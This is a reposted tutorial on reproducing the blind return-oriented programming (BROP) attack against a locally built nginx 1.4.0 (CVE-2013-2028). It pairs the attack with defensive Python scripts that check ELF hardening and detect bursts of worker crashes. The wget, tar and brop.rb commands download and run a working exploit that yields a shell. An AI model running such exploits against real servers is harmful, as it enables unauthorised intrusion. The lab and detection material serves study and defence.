BROP Attack Example

Reposted from: http://ytliu.info/blog/2014/06/01/blind-return-oriented-programming-brop-attack-er/

Following the first session, which covered the principle of the BROP attack, this page discusses how to carry out the real exploit on a Linux system.

This session is more of a tutorial on how I reproduced, on my PC, one of the three attacks carried out by the authors: attacking nginx 1.4.0 through a buffer overflow bug (CVE-2013-2028) and finally executing a shell.

Setting Up Nginx-1.4.0

First, we need to set up the server environment: nginx 1.4.0.

Download the nginx 1.4.0 source code:

Complete before configure:

$ wget nginx.org/download/nginx-1.4.0.tar.gz
$ tar zxvf nginx-1.4.0.tar.gz
$ cd nginx-1.4.0
$ ./configure --sbin-path=/usr/local/nginx/nginx --conf-path=/usr/local/nginx/nginx.conf --pid-path=/usr/local/nginx/nginx.pid --with-http_ssl_module

Before compiling, modify the generated Makefile to add stack canary protection (-fstack-protector):

vim objs/Makefile
...
CFLAGS = -pipe -O -W -Wall -Wpointer-arith -Wno-unused-parameter -Werror -g -fstack-protector
...
Then compile it:

$ make -j4
$ sudo make install

At this point, it is installed in the /usr/local/nginx folder. If you check it with checksec.sh:

$ wget www.trapkit.de/tools/checksec.sh
$ chmod +x ./checksec.sh
$ ./checksec.sh --file /usr/local/nginx/nginx

You will get the following result:

RELRO now becomes Partial RELRO.

This means it already has NX and stack canary protection.
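To verify the same protections checksec.sh reports without depending on that script, here is an added Python example (not code from the original post or from nginx) that reads the program headers and dynamic section of an ELF64 binary and reports NX, RELRO, PIE and the stack-canary heuristic. build_image() assembles a minimal synthetic ELF image so the checker runs offline; its default build mirrors the result the post describes for nginx (NX, stack canary, partial RELRO, no PIE). The constants come from the ELF specification; the canary check is the same symbol-name heuristic checksec.sh uses and is an approximation.

```python
"""Report the ELF hardening that checksec.sh looks for (NX, RELRO, PIE, stack canary)."""
import struct
import sys

# Constants from the ELF specification / glibc elf.h
ET_EXEC, ET_DYN = 2, 3     # position-independent executables are linked as ET_DYN
PT_DYNAMIC = 2
PT_GNU_STACK = 0x6474E551  # stack permissions; PF_X set means an executable stack
PT_GNU_RELRO = 0x6474E552  # region made read-only after relocation (partial RELRO)
PF_X = 1
DT_NULL, DT_BIND_NOW, DT_FLAGS = 0, 24, 30
DF_BIND_NOW = 0x8          # together with PT_GNU_RELRO this is full RELRO

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # 64-byte ELF64 little-endian header
PHDR = struct.Struct("<IIQQQQQQ")          # 56-byte program header
DYN = struct.Struct("<QQ")                 # 16-byte dynamic-section entry


def check_hardening(data: bytes) -> dict:
    """Parse the program headers and dynamic section of an ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 file")
    fields = EHDR.unpack_from(data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = fields[1], fields[5], fields[9], fields[10]
    phdrs = [PHDR.unpack_from(data, e_phoff + i * e_phentsize) for i in range(e_phnum)]

    # NX: the stack is non-executable unless PT_GNU_STACK is missing or carries PF_X
    stack = [p for p in phdrs if p[0] == PT_GNU_STACK]
    nx = bool(stack) and not (stack[0][1] & PF_X)

    # RELRO: PT_GNU_RELRO alone is partial; BIND_NOW in the dynamic section makes it full
    relro = "none"
    if any(p[0] == PT_GNU_RELRO for p in phdrs):
        relro = "partial"
        for p in phdrs:
            if p[0] != PT_DYNAMIC:
                continue
            off, end = p[2], p[2] + p[5]  # p_offset, p_offset + p_filesz
            while off + DYN.size <= end:
                tag, val = DYN.unpack_from(data, off)
                if tag == DT_NULL:
                    break
                if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW):
                    relro = "full"
                off += DYN.size

    # Canary: heuristic (as in checksec.sh), the __stack_chk_fail symbol name is present
    canary = b"__stack_chk_fail" in data
    return {"nx": nx, "relro": relro, "pie": e_type == ET_DYN, "canary": canary}


def build_image(e_type=ET_EXEC, stack_flags=6, relro=True, bind_now=False, canary=True) -> bytes:
    """Assemble a minimal, non-runnable ELF64 image (constructed test input, not a real binary)."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\0" * 7
    phdrs = [(PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)]
    dyn = b""
    if relro:
        phdrs.append((PT_GNU_RELRO, 4, 0, 0, 0, 0, 0, 1))
        dyn = DYN.pack(DT_FLAGS, DF_BIND_NOW if bind_now else 0) + DYN.pack(DT_NULL, 0)
        dyn_off = EHDR.size + PHDR.size * (len(phdrs) + 1)  # dynamic data follows the headers
        phdrs.append((PT_DYNAMIC, 6, dyn_off, 0, 0, len(dyn), len(dyn), 8))
    ehdr = EHDR.pack(ident, e_type, 62, 1, 0, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, len(phdrs), 64, 0, 0)
    image = ehdr + b"".join(PHDR.pack(*p) for p in phdrs) + dyn
    return image + (b"\0__stack_chk_fail\0" if canary else b"")


if __name__ == "__main__":
    # Usage: python elf_hardening.py /usr/local/nginx/nginx   (no argument: synthetic image)
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            data = f.read()
    else:
        data = build_image()
    for name, value in check_hardening(data).items():
        print(f"{name:7}: {value}")
```

Run it against the freshly built nginx binary to confirm the -fstack-protector change took effect; a missing canary after the Makefile edit usually means the build picked up an unchanged CFLAGS line.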

Before running nginx, we need to modify its configuration so that it runs with 4 worker processes, then start it:

$ vim /usr/local/nginx/nginx.conf
..
worker_processes 4;
..
$ sudo /usr/local/nginx/nginx

Exploit BROP Attack

Now let’s see how to do the BROP attack. It is quite simple, since the authors have already written an nginx-specific attack script in Ruby.

Download the exploit script:

$ wget www.scs.stanford.edu/brop/nginx-1.4.0-exp.tgz
$ tar zxvf nginx-1.4.0-exp.tgz
$ cd nginx-1.4.0-exp

And run it by simply executing:

$ ./brop.rb 127.0.0.1

If everything is OK, it will exploit nginx-1.4.0 using the approach I talked about here, and finally print the id of the exploited shell’s owner.

If there’s any problem and you want to rerun the script, first remove the state.bin file (or even restart nginx), then run brop.rb again:

$ rm -f ./state.bin
$ ./brop.rb 127.0.0.1

That’s done!
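On the defender's side, the footprint of an attack like this is not subtle: every wrong probe crashes a worker, and the nginx master respawns it, so the error log fills with "worker process N exited on signal 11" alerts in a short span. The following is an added Python example, not part of the original post or of nginx, that scans nginx error_log lines for those alerts and raises one alert per burst that reaches a threshold inside a sliding time window. The log lines in SAMPLE_LOG are constructed for the example; the threshold and window are assumptions to tune per site.

```python
"""Flag bursts of nginx worker crashes, the footprint repeated memory-corruption probing leaves."""
import re
from collections import deque
from datetime import datetime, timedelta

# nginx error_log format: "YYYY/MM/DD HH:MM:SS [level] pid#tid: message"; a crash is logged by the
# master as "worker process <pid> exited on signal <n>" (optionally followed by "(core dumped)")
CRASH_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[alert\] \d+#\d+: "
    r"worker process (?P<pid>\d+) exited on signal (?P<sig>\d+)"
)

# Constructed sample log: normal start-up, a burst of six SIGSEGV worker crashes, then noise
SAMPLE_LOG = """\
2014/06/01 12:00:00 [notice] 1000#0: start worker processes
2014/06/01 12:00:00 [notice] 1000#0: start worker process 1001
2014/06/01 12:05:10 [alert] 1000#0: worker process 1001 exited on signal 11
2014/06/01 12:05:12 [alert] 1000#0: worker process 1005 exited on signal 11
2014/06/01 12:05:15 [alert] 1000#0: worker process 1006 exited on signal 11
2014/06/01 12:05:17 [alert] 1000#0: worker process 1007 exited on signal 11
2014/06/01 12:05:20 [alert] 1000#0: worker process 1008 exited on signal 11
2014/06/01 12:05:22 [alert] 1000#0: worker process 1009 exited on signal 11
2014/06/01 12:40:00 [alert] 1000#0: worker process 1010 exited on signal 11
2014/06/01 13:00:00 [error] 1010#0: *1 open() "/usr/local/nginx/html/x" failed (2: No such file or directory)
""".splitlines()


def parse_crashes(lines):
    """Yield (timestamp, worker pid, signal) for every worker-crash alert line."""
    for line in lines:
        m = CRASH_RE.match(line)
        if m:
            yield (datetime.strptime(m["ts"], "%Y/%m/%d %H:%M:%S"), int(m["pid"]), int(m["sig"]))


def detect_crash_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Return one alert per burst of >= threshold worker crashes inside a sliding time window.

    A single crash is ordinary (a bad request, an OOM kill); a burst means something keeps
    hitting a worker that the master keeps respawning.
    """
    alerts = []
    recent = deque()
    for ts, pid, sig in parse_crashes(lines):
        recent.append((ts, pid, sig))
        while recent and ts - recent[0][0] > window:  # drop crashes older than the window
            recent.popleft()
        if len(recent) >= threshold:
            alerts.append({
                "start": recent[0][0], "end": ts, "crashes": len(recent),
                "signals": sorted({s for _, _, s in recent}),
                "pids": [p for _, p, _ in recent],
            })
            recent.clear()  # start a fresh window so one burst yields one alert
    return alerts


if __name__ == "__main__":
    # Usage: python crash_bursts.py < /usr/local/nginx/logs/error.log  (no input: sample log)
    import sys
    lines = sys.stdin.read().splitlines() if not sys.stdin.isatty() else SAMPLE_LOG
    for a in detect_crash_bursts(lines):
        print(f"{a['start']} .. {a['end']}: {a['crashes']} worker crashes, signals {a['signals']}")
```

The sliding window matters more than the exact threshold: a legitimate bug will usually crash a worker once per bad request, while probing produces many crashes within seconds, so even a conservative threshold separates the two.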